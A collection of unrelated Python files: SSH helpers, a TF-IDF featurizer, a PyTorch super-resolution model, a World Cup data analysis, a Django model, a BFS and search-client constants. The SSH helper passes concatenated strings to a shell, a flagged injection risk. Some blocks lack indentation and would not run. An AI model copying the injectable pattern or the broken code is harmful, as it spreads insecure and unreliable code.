    """Submit the ready tasks of every registered flow in rapid-fire mode."""
    for fl in flows:
        fl.rapidfire()
def get_status():
    """Poll the status of every task in every flow, ignoring TypeErrors from check_status."""
    for fl in flows:
        for wk in fl:
            for tsk in wk:
                try:
                    tsk.check_status()
                except TypeError:
                    # Some task states raise TypeError here; skip them.
                    pass
# Build all flow directories and persist the flows immediately on import/run.
build_and_pickle_dump()
#a = Flow.pickle_load(flows[0].workdir)
# Recursively print the multiplication table of n from 1 up to limit.
def print_table(n: int, limit: int) -> None:
    """Print ``n * 1`` through ``n * limit``, one product per line, in order.

    Args:
        n: Number whose multiplication table is printed.
        limit: Highest multiplier; nothing is printed when limit <= 0.
    """
    # BUG FIX: the base case returned 0 from a function annotated -> None,
    # and a negative limit recursed forever; `<= 0` guards both.
    if limit <= 0:
        return None
    print_table(n, limit - 1)
    print(f"{n} * {limit} = {n * limit}")
if __name__ == "__main__":
print_table(20, 10)
print_table(0, 0)
|
import subprocess
import sys

import paramiko
class Precondition(object):
    """Helpers for staging files and running commands on remote machines."""

    @staticmethod
    def put_file(machine_name, user_name, dir_name, filename, data):
        """Upload `data` to dir_name/filename on machine_name over SFTP.

        The target directory is created if missing; an existing one is reused.
        """
        ssh = paramiko.SSHClient()
        # NOTE(review): auto-accepting unknown host keys is convenient for
        # test setup but defeats MITM protection -- confirm this is acceptable.
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(machine_name, username=user_name)
        sftp = ssh.open_sftp()
        try:
            sftp.mkdir(dir_name)
        except IOError:
            pass  # directory already exists
        # BUG FIX: close the remote file even if write() fails.
        f = sftp.open(dir_name + '/' + filename, 'w')
        try:
            f.write(data)
        finally:
            f.close()
        ssh.close()

    @staticmethod
    def ssh_to_server(server_name, server_ip, remote_command):
        """Run remote_command on server_ip as user server_name via ssh.

        Prints the captured stdout lines on success, or the remote stderr
        to this process's stderr when no output was produced.
        """
        str_server_ip = str(server_ip)
        str_server_name = str(server_name)
        # NOTE(review): shell=True with string concatenation is injection-prone
        # if any argument is untrusted; prefer an argument list with shell=False.
        command = subprocess.Popen(["ssh -T " + str_server_name + '@' + str_server_ip + ' ' + remote_command],
                                   shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        result = command.stdout.readlines()
        # BUG FIX: readlines() returns a list, so the old `result == 0` test was
        # never true; treat an empty list as "no output". Also converted the
        # Python-2 print statements and stopped writing the error back into the
        # subprocess's stderr pipe -- report on our own stderr instead.
        if not result:
            error = command.stderr.readlines()
            print("ERROR: %s" % error, file=sys.stderr)
        else:
            print(result)
|
# Python exercise 073: build a tuple with the first 20 teams of the Brazilian
# championship table, in standings order. Then show:
# a) the first 5 teams; b) the last 4 teams;
# c) the teams in alphabetical order; d) the position of Chapecoense.
# BUG FIX: 'Sport Recife' and 'Ceará SC' were each split into two entries,
# so the tuple held 22 "teams"; merged so it holds exactly 20.
brasileirao = ('Atlético', 'Flamengo', 'Corinthians', 'Palmeiras', 'Fluminense', 'America-MG', 'Sao Paulo', 'Grêmio',
               'Vasco da Gama', 'Internacional', 'Botafogo', 'Sport Recife', 'Cruzeiro', 'EC Vitoria', 'Santos',
               'Chapecoense', 'Atlético-PR', 'Bahia', 'Ceará SC', 'Paraná')
print(f"Os cinco primeiros times do brasileirão são: {brasileirao[0:5]}")
print(f"Os quatro últimos colocados do brasileirão são: {brasileirao[-4:]}")
print(f"Os times em ordem alfabética do brasileirão são: {sorted(brasileirao)}")
print(f"O time da Chapecoense do brasileirão está na posição: {brasileirao.index('Chapecoense')}")
|
import numpy as np
import math
from itertools import chain
from collections import Counter
from project.utils.counting import counts_to_probs
from project.utils.text import strip_junk_tokens
################################################################################
# Binary bag of words featurizer
################################################################################
def compute_TF(all_tokens_dict):
    """
    Compute term frequeny per sentence
    @returns {str:sentence : {str:word: float:P(word|sentence)}}
    """
    term_freqs = {}
    for sentence, words in all_tokens_dict.items():
        cleaned_counts = Counter(strip_junk_tokens(words))
        term_freqs[sentence] = counts_to_probs(cleaned_counts)
    return term_freqs
def compute_DF(all_tokens_dict):
    """
    Compute document frequency per word
    @returns {str:word : int:document-count}
    """
    df_counts = Counter()  # number of documents each word appears in
    # Tabulate the number of documents each word appears in; set() ensures a
    # word counts at most once per document. Counter.update replaces the
    # redundant membership if/else -- a Counter defaults missing keys to 0.
    for words in all_tokens_dict.values():
        df_counts.update(set(strip_junk_tokens(words)))
    return df_counts
def compute_TFIDF(all_tokens_dict):
    """
    Computes TFIDF for a given word
    @returns {str:word : float:TFIDF-score}
    """
    tf_table = compute_TF(all_tokens_dict)
    df_table = compute_DF(all_tokens_dict)
    total_docs = float(len(all_tokens_dict.keys()))
    # IDF = log(N / DF); score = TF * IDF per word per sentence.
    return {
        sentence: {word: tf * math.log(total_docs / df_table[word])
                   for (word, tf) in tf_scores.items()}
        for (sentence, tf_scores) in tf_table.items()
    }
def build(train_ids, all_tokens_dict):
    """Assemble the featurizer state.

    Returns (all_tokens_dict, word->index map over the sorted vocabulary,
    per-sentence TFIDF table, unknown-token IDF value).
    """
    # Strip junk from the full corpus and keep each word once, A..Z order.
    cleaned_corpus = strip_junk_tokens(chain.from_iterable(all_tokens_dict.values()))
    vocabulary = sorted(set(cleaned_corpus))
    # Term-frequency * inverse-document-frequency per sentence.
    tfidf_table = compute_TFIDF(all_tokens_dict)
    # IDF assigned to tokens never seen in training.
    unknown_idf = math.log(len(all_tokens_dict))
    # One column index per vocabulary word.
    index_of = {word: position for (position, word) in enumerate(vocabulary)}
    return (all_tokens_dict, index_of, tfidf_table, unknown_idf)
# observation_ids can be training IDs or test observation IDs
def featureize(F, observation_ids):
    """Build the (observations x vocabulary) TF-IDF feature matrix.

    F is the state tuple returned by build(); observation_ids selects and
    orders the rows. Words outside word_indices raise KeyError (unchanged).
    """
    (all_tokens_dict, word_indices, TFIDF, UNK) = F
    n = len(word_indices)
    m = len(observation_ids)
    # Observations
    # BUG FIX: np.float was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin float (np.float64 here) is the supported spelling.
    X = np.zeros((m,n), dtype=float)
    for (i,ob_id) in enumerate(observation_ids, start=0):
        for token in strip_junk_tokens(all_tokens_dict[ob_id]):
            j = word_indices[token]
            X[i][j] = TFIDF[ob_id][token]
    return X
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class ResBlock(nn.Module):
    """Residual block: conv-BN-act followed by conv-BN, plus an identity skip.

    NOTE(review): the skip connection adds the input directly, so it requires
    input_channel == output_channel; callers in this file always pass equal
    counts -- confirm before reusing with differing channels.
    """

    def __init__(self, input_channel, output_channel, act):
        super(ResBlock, self).__init__()
        self.conv1 = nn.Conv2d(input_channel, output_channel, 3, 1, 1)
        self.bn1 = nn.BatchNorm2d(output_channel)
        self.conv2 = nn.Conv2d(output_channel, output_channel, 3, 1, 1)
        self.bn2 = nn.BatchNorm2d(output_channel)
        self.act = act

    def forward(self, x):
        # First stage with activation, second stage without.
        stage_one = self.act(self.bn1(self.conv1(x)))
        stage_two = self.bn2(self.conv2(stage_one))
        # Identity skip connection.
        return x + stage_two
class SRNTT(nn.Module):
    """SRNTT-style reference-based super-resolution network.

    forward() returns (4x-upscaled SR image, texture-transferred SR image);
    the second element is None when no reference feature maps are supplied.
    """

    def __init__(self, n_resblocks, use_weights=False, concat=False):
        super(SRNTT, self).__init__()
        self.n_resblocks = n_resblocks
        self.use_weights = use_weights
        self.concat = concat
        self.relu = nn.ReLU(inplace=True)
        self.tanh = nn.Tanh()
        self.content_extractor = self._content_extractor()
        self.reconstructor = self._reconstructor()
        if self.use_weights and self.concat:
            # BUG FIX: these were plain tensors with requires_grad=True, which
            # model.parameters() and .to(device)/.cuda() ignore, so the
            # optimizer never updated them and they stayed on CPU. nn.Parameter
            # registers them properly. (Note: adds 'a'/'b' to the state_dict.)
            self.a = nn.Parameter(torch.ones(3))
            self.b = nn.Parameter(torch.zeros(3))
        self.texture_transfer = self._texture_transfer()
        self.texture_fusion_medium = self._texture_fusion('medium')
        self.texture_fusion_large = self._texture_fusion('large')
        # Final 1x1 projection from 32 channels to RGB in [-1, 1].
        self.srntt_out = nn.Sequential(nn.Conv2d(32, 3, 1, 1, 0), self.tanh)
        self._init_param()

    def _init_param(self):
        """Normal-initialize conv weights (std 0.02) and BN weights (mean 1, std 0.02)."""
        def _norm_init_conv2d_(m):
            if isinstance(m, nn.Conv2d):
                nn.init.normal_(m.weight, mean=0., std=0.02)
        def _norm_init_batchnorm_(m):
            if isinstance(m, nn.BatchNorm2d):
                nn.init.normal_(m.weight, mean=1., std=0.02)
        self.content_extractor.apply(_norm_init_conv2d_)
        self.content_extractor.apply(_norm_init_batchnorm_)
        self.reconstructor.apply(_norm_init_conv2d_)
        self.texture_transfer.apply(_norm_init_conv2d_)
        self.texture_transfer.apply(_norm_init_batchnorm_)
        self.texture_fusion_medium.apply(_norm_init_conv2d_)
        self.texture_fusion_medium.apply(_norm_init_batchnorm_)
        self.texture_fusion_large.apply(_norm_init_conv2d_)
        self.texture_fusion_large.apply(_norm_init_batchnorm_)
        self.srntt_out.apply(_norm_init_conv2d_)

    def _content_extractor(self):
        """Feature extractor: head conv, 16 residual blocks, tail conv+BN."""
        # (3, h, w) => (64, h, w)
        layers = [nn.Sequential(nn.Conv2d(3, 64, 3, 1, 1), self.relu)]
        # (64, h, w) => (64, h, w)
        res_layers = []
        for _ in range(16):
            res_layers.append(ResBlock(64, 64, self.relu))
        layers.append(nn.Sequential(*res_layers))
        # (64, h, w) => (64, h, w)
        layers.append(nn.Sequential(
            nn.Conv2d(64, 64, 3, 1, 1),
            nn.BatchNorm2d(64),
        ))
        return nn.ModuleList(layers)

    def _reconstructor(self):
        """Two PixelShuffle x2 upscales followed by a 1x1 projection to RGB."""
        layers = [
            # (64, h, w) => (64, h*2, w*2)
            nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(upscale_factor=2), self.relu),
            # (64, h*2, w*2) => (64, h*4, w*4)
            nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(upscale_factor=2), self.relu),
            # (64, h*4, w*4) => (3, h*4, w*4)
            nn.Sequential(nn.Conv2d(64, 3, 1, 1, 0), self.tanh),
        ]
        return nn.Sequential(*layers)

    def _texture_transfer(self):
        """First texture stage: fuse 128-ch concat input, residual blocks, x2 upscale."""
        layers = [nn.Sequential(nn.Conv2d(128, 64, 3, 1, 1), self.relu)]
        res_blocks = []
        for _ in range(self.n_resblocks):
            res_blocks.append(ResBlock(64, 64, self.relu))
        layers.append(nn.Sequential(*res_blocks))
        layers.append(nn.Sequential(nn.Conv2d(64, 64, 3, 1, 1), nn.BatchNorm2d(64)))
        layers.append(nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(upscale_factor=2), self.relu))
        return nn.ModuleList(layers)

    def _texture_fusion(self, name):
        """Later texture stages; 'medium' upscales x2, 'large' projects to 32 channels."""
        if name == 'medium':
            n_resblocks = self.n_resblocks // 2
            end_layer = nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(upscale_factor=2), self.relu)
        elif name == 'large':
            n_resblocks = self.n_resblocks // 4
            end_layer = nn.Conv2d(64, 32, 3, 1, 1)
        else:
            raise ValueError('No such layer name {}!'.format(name))
        layers = [nn.Sequential(nn.Conv2d(128, 64, 3, 1, 1), self.relu)]
        res_blocks = []
        for _ in range(n_resblocks):
            res_blocks.append(ResBlock(64, 64, self.relu))
        layers.append(nn.Sequential(*res_blocks))
        layers.append(nn.Sequential(nn.Conv2d(64, 64, 3, 1, 1), nn.BatchNorm2d(64)))
        layers.append(end_layer)
        return nn.ModuleList(layers)

    def forward(self, x, weights, maps):
        """Run content extraction, plain 4x reconstruction, and (optionally) texture transfer.

        maps, when given, is a list/tuple of three reference feature maps at
        increasing spatial scale; weights modulates them when use_weights and
        concat are both enabled.
        """
        # Content features with a long skip from the head conv output.
        x = self.content_extractor[0](x)
        output = self.content_extractor[1](x)
        content_feature = self.content_extractor[2](output)
        output = x + content_feature
        output_upscale = self.reconstructor(output)
        # Without reference maps only the plain SR output is produced.
        if maps is None:
            return output_upscale, None
        assert isinstance(maps, (list, tuple))
        output = content_feature
        for idx, sub_module in enumerate([self.texture_transfer, self.texture_fusion_medium, self.texture_fusion_large]):
            if self.use_weights and self.concat:
                # Match the weight map to this stage's spatial scale, then gate
                # the reference map with a learned per-stage affine + sigmoid.
                new_weights = F.interpolate(weights, scale_factor=2**idx, mode='bicubic', align_corners=True)
                map_ref = maps[idx] * torch.sigmoid(self.a[idx] * new_weights + self.b[idx])
            else:
                map_ref = maps[idx]
            map_in = output
            output = sub_module[0](torch.cat([map_in, map_ref], dim=1))
            output = sub_module[1](output)
            output = sub_module[2](output)
            # Residual connection around the stage before the final layer.
            output = sub_module[3](output + map_in)
        output_srntt = self.srntt_out(output)
        return output_upscale, output_srntt
if __name__ == '__main__':
    # Smoke test: forward pass with weights + concat enabled and three
    # reference feature maps at 1x, 2x, and 4x spatial scale.
    net = SRNTT(8, True, True)
    x = torch.randn(1, 3, 16, 16)
    maps = [torch.randn(1, 64, 16, 16), torch.randn(1, 64, 32, 32), torch.randn(1, 64, 64, 64)]
    weights = torch.randn(1, 1, 16, 16)
    net(x, weights, maps)
|
#The question being answered is: Does playing in your home continent make a difference?
#Load in packages needed
import pandas as pd
#Load in Datasets
cups = pd.read_csv('/Users/ethanmitten/Desktop/Data Analytics/Python Projects/WorldCupDataset/WorldCups.csv')
matches = pd.read_csv('/Users/ethanmitten/Desktop/Data Analytics/Python Projects/WorldCupDataset/WorldCupMatches.csv')
#See some general information and then see how many null values are missing
print(matches.info)
x = matches.isnull().sum()
print(x)
#Shorten data down to only relevant rows
matches_clean = matches[0:852]
#Drop Null Values and Print Output of How Many Null Values Left
matches_clean = matches_clean.dropna()
#Merge Datasets to get the Host Country for each match
merged_mc = pd.merge(matches_clean, cups, on='Year')
merged_mc = merged_mc.drop(merged_mc.columns[[21,22,23,24,25,26,27,28]], axis=1)
#Add new columns that return boolean values based on whether win or lose
merged_mc['Home_Team_Wins'] = merged_mc['Home Team Goals'].gt(merged_mc['Away Team Goals'])
merged_mc['Away_Team_Wins'] = merged_mc['Away Team Goals'].gt(merged_mc['Home Team Goals'])
#Making Columns for Home Team and Away Team Continents
rating = []
for row in merged_mc['Home Team Name']:
if row == 'France' : rating.append('Europe')
elif row == 'England': rating.append('Europe')
elif row == 'USA': rating.append('North_America')
elif row == 'Poland': rating.append('Europe')
elif row == 'Portugal': rating.append('Europe')
elif row == 'Algeria': rating.append("Africa")
elif row == 'Angola': rating.append("Africa")
elif row == 'Argentina': rating.append("South_America")
elif row == 'Australia': rating.append("Australia")
elif row == 'Austria': rating.append("Europe")
elif row == 'Belgium': rating.append("Europe")
elif row == 'Brazil': rating.append("South_America")
elif row == 'Bolivia': rating.append("South_America")
elif row == 'Bulgaria': rating.append("Europe")
elif row == 'Cameroon': rating.append("Africa")
elif row == 'Canada': rating.append("North_America")
elif row == 'Chile': rating.append("South_America")
elif row == 'China PR': rating.append("Asia")
elif row == 'Colombia': rating.append("South_America")
elif row == 'Costa Rica': rating.append("North_America")
elif row == 'Croatia': rating.append("Europe")
elif row == 'Cuba': rating.append("North_America")
elif row == 'Czech Republic': rating.append("Europe")
elif row == 'Czechoslovakia': rating.append("Europe")
elif row == "Cote d'Ivoire": rating.append("Africa")
elif row == 'Denmark': rating.append("Europe")
elif row == 'Ecuador': rating.append("South_America")
elif row == 'German DR': rating.append("Europe")
elif row == 'Germany': rating.append("Europe")
elif row == 'Germany FR': rating.append("Europe")
elif row == 'Ghana': rating.append("Africa")
elif row == 'Greece': rating.append("Europe")
elif row == 'Haiti': rating.append("North_America")
elif row == 'Honduras': rating.append("North_America")
elif row == 'Hungary': rating.append("Europe")
elif row == 'IR Iran': rating.append("Asia")
elif row == 'Iran': rating.append("Asia")
elif row == 'Iraq': rating.append("Asia")
elif row == 'Italy': rating.append("Europe")
elif row == 'Jamaica': rating.append("North_America")
elif row == 'Japan': rating.append("Asia")
elif row == 'Korea DPR': rating.append("Asia")
elif row == 'Korea Republic': rating.append("Asia")
elif row == 'Mexico': rating.append("North_America")
elif row == 'Morocco': rating.append("Africa")
elif row == 'Netherlands': rating.append("Europe")
elif row == 'New Zealand': rating.append("Australia")
elif row == 'Nigeria': rating.append("Africa")
elif row == 'Northern Ireland': rating.append("Europe")
elif row == 'Norway': rating.append("Europe")
elif row == 'Paraguay': rating.append("South_America")
elif row == 'Peru': rating.append("South_America")
elif row == 'Romania': rating.append("Europe")
elif row == 'Russia': rating.append("Europe")
elif row == 'Saudi Arabia': rating.append("Asia")
elif row == 'Scotland': rating.append("Europe")
elif row == 'Senegal': rating.append("Africa")
elif row == 'Serbia': rating.append("Europe")
elif row == 'Slovakia': rating.append("Europe")
elif row == 'Slovenia': rating.append("Europe")
elif row == 'South Africa': rating.append("Africa")
elif row == 'Soviet Union': rating.append("Europe")
elif row == 'Spain': rating.append("Europe")
elif row == 'Sweden': rating.append("Europe")
elif row == 'Switzerland': rating.append("Europe")
elif row == 'Togo': rating.append("Africa")
elif row == 'Tunisia': rating.append("Africa")
elif row == 'Turkey': rating.append("Europe")
elif row == 'Ukraine': rating.append("Europe")
elif row == 'Uruguay': rating.append("South_America")
elif row == 'Wales': rating.append("Europe")
elif row == 'Yugoslavia': rating.append("Europe")
elif row == 'Zaire': rating.append("Africa")
else: rating.append('Not_Rated')
merged_mc['Home_Cont'] = rating
ratings = []
for row in merged_mc['Away Team Name']:
if row == 'France' : ratings.append('Europe')
elif row == 'England': ratings.append('Europe')
elif row == 'USA': ratings.append('North_America')
elif row == 'Poland': ratings.append('Europe')
elif row == 'Portugal': ratings.append('Europe')
elif row == 'Algeria': ratings.append("Africa")
elif row == 'Angola': ratings.append("Africa")
elif row == 'Argentina': ratings.append("South_America")
elif row == 'Australia': ratings.append("Australia")
elif row == 'Austria': ratings.append("Europe")
elif row == 'Belgium': ratings.append("Europe")
elif row == 'Brazil': ratings.append("South_America")
elif row == 'Bolivia': ratings.append("South_America")
elif row == 'Bulgaria': ratings.append("Europe")
elif row == 'Cameroon': ratings.append("Africa")
elif row == 'Canada': ratings.append("North_America")
elif row == 'Chile': ratings.append("South_America")
elif row == 'China PR': ratings.append("Asia")
elif row == 'Colombia': ratings.append("South_America")
elif row == 'Costa Rica': ratings.append("North_America")
elif row == 'Croatia': ratings.append("Europe")
elif row == 'Cuba': ratings.append("North_America")
elif row == 'Czech Republic': ratings.append("Europe")
elif row == 'Czechoslovakia': ratings.append("Europe")
elif row == "Cote d'Ivoire": ratings.append("Africa")
elif row == 'Denmark': ratings.append("Europe")
elif row == 'Ecuador': ratings.append("South_America")
elif row == 'German DR': ratings.append("Europe")
elif row == 'Germany': ratings.append("Europe")
elif row == 'Germany FR': ratings.append("Europe")
elif row == 'Ghana': ratings.append("Africa")
elif row == 'Greece': ratings.append("Europe")
elif row == 'Haiti': ratings.append("North_America")
elif row == 'Honduras': ratings.append("North_America")
elif row == 'Hungary': ratings.append("Europe")
elif row == 'IR Iran': ratings.append("Asia")
elif row == 'Iran': ratings.append("Asia")
elif row == 'Iraq': ratings.append("Asia")
elif row == 'Italy': ratings.append("Europe")
elif row == 'Jamaica': ratings.append("North_America")
elif row == 'Japan': ratings.append("Asia")
elif row == 'Korea DPR': ratings.append("Asia")
elif row == 'Korea Republic': ratings.append("Asia")
elif row == 'Mexico': ratings.append("North_America")
elif row == 'Morocco': ratings.append("Africa")
elif row == 'Netherlands': ratings.append("Europe")
elif row == 'New Zealand': ratings.append("Australia")
elif row == 'Nigeria': ratings.append("Africa")
elif row == 'Northern Ireland': ratings.append("Europe")
elif row == 'Norway': ratings.append("Europe")
elif row == 'Paraguay': ratings.append("South_America")
elif row == 'Peru': ratings.append("South_America")
elif row == 'Romania': ratings.append("Europe")
elif row == 'Russia': ratings.append("Europe")
elif row == 'Saudi Arabia': ratings.append("Asia")
elif row == 'Scotland': ratings.append("Europe")
elif row == 'Senegal': ratings.append("Africa")
elif row == 'Serbia': ratings.append("Europe")
elif row == 'Slovakia': ratings.append("Europe")
elif row == 'Slovenia': ratings.append("Europe")
elif row == 'South Africa': ratings.append("Africa")
elif row == 'Soviet Union': ratings.append("Europe")
elif row == 'Spain': ratings.append("Europe")
elif row == 'Sweden': ratings.append("Europe")
elif row == 'Switzerland': ratings.append("Europe")
elif row == 'Togo': ratings.append("Africa")
elif row == 'Tunisia': ratings.append("Africa")
elif row == 'Turkey': ratings.append("Europe")
elif row == 'Ukraine': ratings.append("Europe")
elif row == 'Uruguay': ratings.append("South_America")
elif row == 'Wales': ratings.append("Europe")
elif row == 'Yugoslavia': ratings.append("Europe")
elif row == 'Egypt': ratings.append("Africa")
elif row == 'Kuwait': ratings.append("Asia")
elif row == 'El Salvador': ratings.append("North_America")
elif row == 'Israel': ratings.append("Asia")
elif row == 'Dutch West Indies': ratings.append("Asia")
elif row == 'Zaire': ratings.append("Africa")
else: ratings.append('Not_Rated')
merged_mc['Away_Cont'] = ratings
# Home_Team_Wins is boolean; describe() reports the True/False frequency split
# (True is seen 486 times, False the rest of the time).
print(merged_mc['Home_Team_Wins'].describe())
# Split the matches into those won by the home side and those won by the away side.
home_winners = merged_mc[merged_mc['Home_Team_Wins'] == True]
away_winners = merged_mc[merged_mc['Away_Team_Wins'] == True]
# Win counts grouped by tournament year and the winning side's continent.
home_year_winners = home_winners.groupby(['Year', 'Home_Cont']).size()
# BUG FIX: away wins must be counted from away_winners; the original grouped
# home_winners a second time, so away_year_winners duplicated the home counts.
away_year_winners = away_winners.groupby(['Year', 'Away_Cont']).size()
# Concatenate home_year_winners and away_year_winners for easier interpretation.
merged_winners = pd.concat([home_year_winners, away_year_winners], axis=1)
# Hand-transcribed summary of the results read off the merged_winners table.
final_piece = {'Year': [1930, 1934, 1938, 1950, 1954, 1958, 1962, 1966, 1970, 1974,
                        1978, 1982, 1986, 1990, 1994, 1998, 2002, 2006, 2010, 2014],
               'Host_Country': ['Uruguay', 'Italy', 'France', 'Brazil', 'Switzerland',
                                'Sweden', 'Chile', 'England', 'Mexico', 'Germany',
                                'Argentina', 'Spain', 'Mexico', 'Italy', 'USA',
                                'France', 'Korea/Japan', 'Germany', 'South Africa',
                                'Brazil'],
               'Host_Continent': ['South_America', 'Europe', 'Europe', 'South_America',
                                  'Europe', 'Europe', 'South_America', 'Europe', 'North_America',
                                  'Europe', 'South_America', 'Europe', 'North_America', 'Europe',
                                  'North_America', 'Europe', 'Asia', 'Europe', 'Africa', 'South_America'],
               'Europe_Wins': [10,28,23,19,37,37,33,40,30,19,36,33,24,32,29,30,27,26,19,25],
               'South_America_Wins': [20,2,4,13,7,9,18,10,15,7,15,10,12,9,8,12,10,11,10,23],
               'North_America_Wins': [6,1,2,6,2,2,3,1,6,2,3,3,3,5,4,3,4,6,3,6],
               'Africa': [0,1,0,0,0,0,0,0,2,1,2,1,1,4,6,6,5,6,4,6],
               'Australia':[0,0,0,0,0,0,0,0,0,1,0,3,0,0,0,0,0,3,2,1],
               'Asia': [0,0,0,0,2,0,0,3,1,0,2,2,2,1,3,5,8,5,7,3]}
# Final dataframe detailing the findings for the question.
final_dataframe = pd.DataFrame.from_dict(final_piece)
# Conclusion: the host country does NOT have an effect on how many wins are
# gathered, as Europe has the most wins in every World Cup played.
|
from django.db import models
class NameManager(models.Manager):
    """Manager for Name adding used/unused filtering helpers."""

    def get_unused(self):
        """
        Returns a queryset of all entities not yet marked as used.
        """
        return self.filter(used=False)

    def get_used(self):
        """
        Returns a queryset of all entities already marked as used.
        """
        return self.filter(used=True)

    def get_unused_random(self):
        """
        Returns one random unused name, or None if none exists or the
        lookup fails.

        ``first()`` already yields None on an empty queryset; the except
        clause is kept only as a best-effort guard against database errors.
        BUG FIX: the bare ``except:`` also swallowed SystemExit and
        KeyboardInterrupt — narrowed to ``except Exception``.
        """
        try:
            return self.get_unused().order_by('?').first()
        except Exception:
            return None
class Name(models.Model):
    """A name that can be handed out; ``used`` tracks whether it was consumed."""

    name = models.CharField(max_length=100, help_text="The name.")
    used = models.BooleanField(default=False, help_text="Check after the name is used.")
    objects = NameManager()

    def save(self, *args, **kwargs):
        """
        Save the model, title-casing a brand-new name when the user entered
        no capital letters at all.

        BUG FIX: the override now accepts and forwards ``*args``/``**kwargs``
        (``force_insert``, ``using``, ``update_fields``, ...), which Django
        passes internally; the previous zero-argument signature broke those
        calls with a TypeError.
        """
        # capitalize using the .title() method ONLY if the user did not enter
        # ANY capital letters, and only before the first save (no pk yet)
        if not self.pk:
            if not any(ch.isupper() for ch in self.name):
                self.name = self.name.title()
        super(Name, self).save(*args, **kwargs)

    def __unicode__(self):
        return self.name
|
def neighbors(current, grid):
    """Return the in-bounds 4-neighbours of *current*, an (x, y) pair.

    *grid* is a list of rows, so the width is len(grid[0]) and the height
    is len(grid). Order is always: left, right, up, down (bounds allowing).
    """
    x, y = current
    width = len(grid[0])
    height = len(grid)
    result = []
    if x > 0:
        result.append((x - 1, y))
    if x + 1 < width:
        result.append((x + 1, y))
    if y > 0:
        result.append((x, y - 1))
    if y + 1 < height:
        result.append((x, y + 1))
    return result
def bfs(start, goals, grid):
    """
    Using BFS to get the path to the nearest goal.

    :param start: (x, y) starting coordinate.
    :param goals: collection of (x, y) goal coordinates.
    :param grid: list of rows; used for its dimensions (directly and via
                 neighbors()).
    :return: list of (x, y) steps, excluding *start* and including the
             reached goal ([] when *start* itself is a goal).
    :raises ValueError: if no goal is reachable.
    """
    # PERF FIX: list.pop(0) is O(n) per dequeue, making the search O(n^2)
    # on large grids; deque.popleft() is O(1).
    from collections import deque

    size_x = len(grid[0])
    size_y = len(grid)
    visited = [[False for _ in range(size_x)] for _ in range(size_y)]
    parent = [[None for _ in range(size_x)] for _ in range(size_y)]
    queue = deque([start])
    visited[start[1]][start[0]] = True
    while queue:
        current = queue.popleft()
        if current in goals:
            # Walk the parent chain back to start (start's parent stays None).
            path = []
            while parent[current[1]][current[0]]:
                path.append(current)
                current = parent[current[1]][current[0]]
            return path[::-1]
        for neighbor in neighbors(current, grid):
            if not visited[neighbor[1]][neighbor[0]]:
                queue.append(neighbor)
                parent[neighbor[1]][neighbor[0]] = current
                visited[neighbor[1]][neighbor[0]] = True
    raise ValueError('No Path Found')
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Python client library for Sensei
"""
import urllib
import urllib2
import json
import sys
import logging
import datetime
logger = logging.getLogger("sensei_client")
# TODO:
#
# 1. Term vector
#
# REST API parameter constants
#
PARAM_OFFSET = "start"
PARAM_COUNT = "rows"
PARAM_QUERY = "q"
PARAM_QUERY_PARAM = "qparam"
PARAM_SORT = "sort"
PARAM_SORT_ASC = "asc"
PARAM_SORT_DESC = "desc"
PARAM_SORT_SCORE = "relevance"
PARAM_SORT_SCORE_REVERSE = "relrev"
PARAM_SORT_DOC = "doc"
PARAM_SORT_DOC_REVERSE = "docrev"
PARAM_FETCH_STORED = "fetchstored"
PARAM_SHOW_EXPLAIN = "showexplain"
PARAM_ROUTE_PARAM = "routeparam"
PARAM_GROUP_BY = "groupby"
PARAM_MAX_PER_GROUP = "maxpergroup"
PARAM_SELECT = "select"
PARAM_SELECT_VAL = "val"
PARAM_SELECT_NOT = "not"
PARAM_SELECT_OP = "op"
PARAM_SELECT_OP_AND = "and"
PARAM_SELECT_OP_OR = "or"
PARAM_SELECT_PROP = "prop"
PARAM_FACET = "facet"
PARAM_DYNAMIC_INIT = "dyn"
PARAM_PARTITIONS = "partitions"
PARAM_FACET_EXPAND = "expand"
PARAM_FACET_MAX = "max"
PARAM_FACET_MINHIT = "minhit"
PARAM_FACET_ORDER = "order"
PARAM_FACET_ORDER_HITS = "hits"
PARAM_FACET_ORDER_VAL = "val"
PARAM_DYNAMIC_TYPE = "type"
PARAM_DYNAMIC_TYPE_STRING = "string"
PARAM_DYNAMIC_TYPE_BYTEARRAY = "bytearray"
PARAM_DYNAMIC_TYPE_BOOL = "boolean"
PARAM_DYNAMIC_TYPE_INT = "int"
PARAM_DYNAMIC_TYPE_LONG = "long"
PARAM_DYNAMIC_TYPE_DOUBLE = "double"
PARAM_DYNAMIC_VAL = "vals"
PARAM_RESULT_PARSEDQUERY = "parsedquery"
PARAM_RESULT_HIT_STORED_FIELDS = "stored"
PARAM_RESULT_HIT_STORED_FIELDS_NAME = "name"
PARAM_RESULT_HIT_STORED_FIELDS_VALUE = "val"
PARAM_RESULT_HIT_EXPLANATION = "explanation"
PARAM_RESULT_FACETS = "facets"
PARAM_RESULT_TID = "tid"
PARAM_RESULT_TOTALDOCS = "totaldocs"
PARAM_RESULT_NUMHITS = "numhits"
PARAM_RESULT_HITS = "hits"
PARAM_RESULT_HIT_UID = "uid"
PARAM_RESULT_HIT_DOCID = "docid"
PARAM_RESULT_HIT_SCORE = "score"
PARAM_RESULT_HIT_SRC_DATA = "srcdata"
PARAM_RESULT_TIME = "time"
PARAM_SYSINFO_NUMDOCS = "numdocs"
PARAM_SYSINFO_LASTMODIFIED = "lastmodified"
PARAM_SYSINFO_VERSION = "version"
PARAM_SYSINFO_FACETS = "facets"
PARAM_SYSINFO_FACETS_NAME = "name"
PARAM_SYSINFO_FACETS_RUNTIME = "runtime"
PARAM_SYSINFO_FACETS_PROPS = "props"
